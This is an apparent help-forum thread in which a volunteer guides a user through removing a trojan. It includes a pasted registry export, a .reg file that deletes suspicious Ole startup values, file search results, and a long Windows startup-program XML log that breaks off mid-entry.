Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

help i have trojan horse collected.5.L [RESOLVED]


  • This topic is locked This topic is locked

#136
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello thanks for the help
here is the txt file
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]
"DefaultLaunchPermission"=hex:01,00,04,80,64,00,00,00,80,00,00,00,00,00,00,00,\
14,00,00,00,02,00,50,00,03,00,00,00,00,00,18,00,01,00,00,00,01,01,00,00,00,\
00,00,05,12,00,00,00,00,00,00,00,00,00,18,00,01,00,00,00,01,01,00,00,00,00,\
00,05,04,00,00,00,00,00,00,00,00,00,18,00,01,00,00,00,01,02,00,00,00,00,00,\
05,20,00,00,00,20,02,00,00,01,05,00,00,00,00,00,05,15,00,00,00,a0,5f,84,1f,\
5e,2e,6b,49,ce,12,03,03,f4,01,00,00,01,05,00,00,00,00,00,05,15,00,00,00,a0,\
5f,84,1f,5e,2e,6b,49,ce,12,03,03,f4,01,00,00
"EnableDCOM"="N"
"EnableRemoteConnect"="N"
"MSN Messanger"="msnmsng.exe"
"Distributed Tracking Link Coordinator"="msvcsq.exe"

cheers
  • 0

Advertisements


#137
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
Yiiihhaaaa :tazz: :)
We found where it was hiding. (I think)

Copy the part in bold below into notepad and save it as getoutofmyole.reg
Set filetype to "All files"

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]
"MSN Messanger"=-
"Distributed Tracking Link Coordinator"=-


Doubleclick that file and confirm you want to merge it with the registry.

Then reboot and see if these files are present:
msnmsng.exe
msvcsq.exe

If so delete those as well. Watch the names carefully. Don't delete anything just because it looks like them. :)

Regards,
  • 0

#138
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello
i have followed instructions had one instance of the ftp thing since have done the search on the files and this is what it came up with
for msnmsng.exe
spybot.txt c:\
collecteddata_105.xml c:\windows\pchealth\helpctr\datacoll
collecteddata_1095.xml c:\windows\pchealth\helpctr\datacoll
collecteddata_1575.xml c:\windows\pchealth\helpctr\datacoll
collecteddata_1635.xml c:\windows\pchealth\helpctr\datacoll
collecteddata_1665.xml c:\windows\pchealth\helpctr\datacoll
collecteddata_1695.xml c:\windows\pchealth\helpctr\datacoll
collecteddata_1755.xml c:\windows\pchealth\helpctr\datacoll
collecteddata_1784.xml c:\windows\pchealth\helpctr\datacoll
search on msvcsq revealed the following
spybot.txt c:\
ad-awarelog2005-06-02-20-06-42.txt c:\documents and settings\dug and tania\mydocuments
ad-aware.txt c:\documents and settings\dug and tania\mydocuments
ad-awarelog2005-06-02-20-14-26.txt c:\documents and settings\dug and tania\mydocuments
ad-aware2.txt c:\documents and settings\dug and tania\mydocuments
ad-awarelog2005-06-02-20-44-04.txt c:\documents and settings\dug and tania\mydocuments
collecteddata_1575.xml c:\windows\pchealth\helpctr\datacoll
collecteddata_1605.xml c:\windows\pchealth\helpctr\datacoll
i have deleted nothing so far thanks for your help
  • 0

#139
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
I'm sorry. It looks as if you did a search for files containing those names, but this time I wanted you to search for the files themselves.

By the looks of it msvcsq was already removed by AdAware.

Keep an eye on the Processguard logs and let me know if the files are found.

Also I'd like to see the content of one of those xml files.

It think this will be the most recent:
c:\windows\pchealth\helpctr\datacoll\collecteddata_1784.xml

You can open them by rightclicking and open in notepad.
Have a quick look before you post them, just in case they contain personal info.

Regards,
  • 0

#140
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello again
I have got hold of another hard drive with a clean install of xp and now have the infected drive as a slave drive, can you help me with
how do i clean off the xp installatiuon from the infected harddrive without loosing all the installed programmes on there?
is this possible/worthwhile?
or should i just save the files i need and reformat?
thanks so much for your help i really appreciate the effort you have put in over the last 8 weeks
Cheers
  • 0

#141
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
To get the registry in order for your new setup, you will have to install the programs from sratch.
If you want to keep the infected drive in, you can choose existing folders on that drive to install the program files into, during the install process.
That might save you some time and you will keep the documents you created.

But if you do not have the opportunity to keep the slave drive, the scenario you described fits.

I was glad to help but it would have been nicer to solve this puzzle.

Please do have a look at my site about removing and preventing spyware.

Regards,
  • 0

#142
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello again
i have not changed anything on the infected drive as yet and if you still wish to solve it i am keen to keep going, has been quite a learning experience for me have looked for these
msnmsng.exe
msvcsq.exe
but did not find them
here is the logfile txt that you wished to look at
<?xml version="1.0" encoding="unicode"?>
<CIM CIMVERSION="2.0" DTDVERSION="2.0"><DECLARATION><DECLGROUP.WITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">"C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">TkBellExe</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">All Users</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>"C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>TkBellExe</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>All Users</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">"C:\Program Files\ProcessGuard\pgaccount.exe"</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">!1_pgaccount</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">All Users</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>"C:\Program Files\ProcessGuard\pgaccount.exe"</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>!1_pgaccount</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>All Users</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">"C:\Program Files\ProcessGuard\procguard.exe" -minimize</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKU\S-1-5-21-2000478354-1677128483-725345543-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">!1_ProcessGuard_Startup</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">MYCOMPUTER\Dug And Tania</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>"C:\Program Files\ProcessGuard\procguard.exe" -minimize</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKU\S-1-5-21-2000478354-1677128483-725345543-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>!1_ProcessGuard_Startup</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>MYCOMPUTER\Dug And Tania</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">"C:\Program Files\QuickTime\qttask.exe" -atboottime</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">QuickTime Task</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">All Users</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>"C:\Program Files\QuickTime\qttask.exe" -atboottime</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>QuickTime Task</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>All Users</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">%systemroot%\system32\dumprep 0 -k</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">KernelFaultCheck</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">All Users</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>%systemroot%\system32\dumprep 0 -k</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>KernelFaultCheck</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>All Users</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">advpsys.exe</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">Advanced Protection System</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">.DEFAULT</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>advpsys.exe</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>Advanced Protection System</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>.DEFAULT</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">advpsys.exe</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">Advanced Protection System</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">NT AUTHORITY\SYSTEM</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>advpsys.exe</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>Advanced Protection System</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>NT AUTHORITY\SYSTEM</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">c:\documents and settings\dug and tania\my documents\downloads\regprot.exe /start</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">RegProt</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">All Users</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>c:\documents and settings\dug and tania\my documents\downloads\regprot.exe /start</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>RegProt</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>All Users</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">AdaptecDirectCD</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">All Users</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>AdaptecDirectCD</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>All Users</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">AVG7_CC</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">All Users</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>AVG7_CC</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>All Users</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">AVG7_EMC</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">All Users</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>AVG7_EMC</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>All Users</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">C:\PROGRA~1\Grisoft\AVGFRE~1\avgw.exe /RUNONCE</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">AVG7_Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">.DEFAULT</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>C:\PROGRA~1\Grisoft\AVGFRE~1\avgw.exe /RUNONCE</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>AVG7_Run</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>.DEFAULT</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">C:\PROGRA~1\Grisoft\AVGFRE~1\avgw.exe /RUNONCE</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">AVG7_Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">NT AUTHORITY\SYSTEM</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>C:\PROGRA~1\Grisoft\AVGFRE~1\avgw.exe /RUNONCE</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>AVG7_Run</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>NT AUTHORITY\SYSTEM</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">C:\PROGRA~1\MICROS~1\Office\Osa9.exe -b -l</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">Common Startup</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">Microsoft Office</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">All Users</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>C:\PROGRA~1\MICROS~1\Office\Osa9.exe -b -l</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>Common Startup</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>Microsoft Office</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>All Users</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">C:\WINDOWS\System32\\NeroCheck.exe</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">NeroCheck</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">All Users</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>C:\WINDOWS\System32\\NeroCheck.exe</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>NeroCheck</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>All Users</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">C:\WINDOWS\System32\CTFMON.EXE</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">CTFMON.EXE</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">.DEFAULT</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>C:\WINDOWS\System32\CTFMON.EXE</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>CTFMON.EXE</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>.DEFAULT</VALUE></PROPERTY></INSTANCE></VALUE.OBJECTWITHPATH><VALUE.OBJECTWITHPATH><INSTANCEPATH><NAMESPACEPATH><HOST>MYCOMPUTER</HOST><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></NAMESPACEPATH><INSTANCENAME CLASSNAME="Win32_StartupCommand"><KEYBINDING NAME="Command"><KEYVALUE VALUETYPE="string">C:\WINDOWS\System32\CTFMON.EXE</KEYVALUE></KEYBINDING><KEYBINDING NAME="Location"><KEYVALUE VALUETYPE="string">HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</KEYVALUE></KEYBINDING><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">CTFMON.EXE</KEYVALUE></KEYBINDING><KEYBINDING NAME="User"><KEYVALUE VALUETYPE="string">NT AUTHORITY\SYSTEM</KEYVALUE></KEYBINDING></INSTANCENAME></INSTANCEPATH><INSTANCE CLASSNAME="Win32_StartupCommand"><PROPERTY NAME="Command" TYPE="string"><VALUE>C:\WINDOWS\System32\CTFMON.EXE</VALUE></PROPERTY><PROPERTY NAME="Location" TYPE="string"><VALUE>HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</VALUE></PROPERTY><PROPERTY NAME="Name" TYPE="string"><VALUE>CTFMON.EXE</VALUE></PROPERTY><PROPERTY NAME="User" TYPE="string"><VALUE>NT 